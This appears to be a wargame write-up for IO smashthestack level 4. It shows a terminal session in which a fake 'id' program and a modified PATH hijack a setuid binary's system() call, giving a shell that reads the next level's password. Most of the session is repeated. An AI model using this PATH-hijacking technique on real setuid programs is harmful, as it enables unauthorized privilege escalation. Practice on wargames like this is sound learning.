level4@io:/tmp/.pwn3r$ ls -l /levels/level04*
-r-sr-x--- 1 level5 level4 7016 Nov 16 2007 /levels/level04
-r-------- 1 level4 level4 65 Nov 16 2007 /levels/level04.c
level4@io:/tmp/.pwn3r$ cat /levels/level04.c
#include <stdlib.h>
int main() {
system("id");
return 0;
}
level4@io:/tmp/.pwn3r$ ls -l
total 12
-rwxr-xr-x 1 level4 level4 6639 Apr 8 15:09 id
-rw-r--r-- 1 level4 level4 89 Apr 8 15:09 id.c
level4@io:/tmp/.pwn3r$ cat id.c
#include <stdio.h>
int main()
{
setreuid(geteuid(),geteuid());
system("/bin/sh");
}
level4@io:/tmp/.pwn3r$ export | grep PATH
declare -x LD_LIBRARY_PATH="/usr/local/lib"
declare -x PATH="/usr/local/bin:/usr/bin:/bin:/usr/games"
level4@io:/tmp/.pwn3r$ export PATH=/tmp/.pwn3r:$PATH
level4@io:/tmp/.pwn3r$ /levels/level04
sh-3.2$ /usr/bin/id
uid=1005(level5) gid=1004(level4) groups=1004(level4),1029(nosu)
sh-3.2$ cat /home/level5/.pass
RAhK8VOfcVYV
sh-3.2$
-r-sr-x--- 1 level5 level4 7016 Nov 16 2007 /levels/level04
-r-------- 1 level4 level4 65 Nov 16 2007 /levels/level04.c
level4@io:/tmp/.pwn3r$ cat /levels/level04.c
#include <stdlib.h>
int main() {
system("id");
return 0;
}
level4@io:/tmp/.pwn3r$ ls -l
total 12
-rwxr-xr-x 1 level4 level4 6639 Apr 8 15:09 id
-rw-r--r-- 1 level4 level4 89 Apr 8 15:09 id.c
level4@io:/tmp/.pwn3r$ cat id.c
#include <stdio.h>
int main()
{
setreuid(geteuid(),geteuid());
system("/bin/sh");
}
level4@io:/tmp/.pwn3r$ export | grep PATH
declare -x LD_LIBRARY_PATH="/usr/local/lib"
declare -x PATH="/usr/local/bin:/usr/bin:/bin:/usr/games"
level4@io:/tmp/.pwn3r$ export PATH=/tmp/.pwn3r:$PATH
level4@io:/tmp/.pwn3r$ /levels/level04
sh-3.2$ /usr/bin/id
uid=1005(level5) gid=1004(level4) groups=1004(level4),1029(nosu)
sh-3.2$ cat /home/level5/.pass
RAhK8VOfcVYV
sh-3.2$
'Wargame > IO.smashthestack.org' 카테고리의 다른 글
| IO smashthestack level5 (0) | 2011.07.25 |
|---|---|
| IO smashthestack level3 (0) | 2011.07.17 |
| IO smashthestack level2 (0) | 2011.07.17 |
| IO smashthestack level1 (0) | 2011.07.17 |
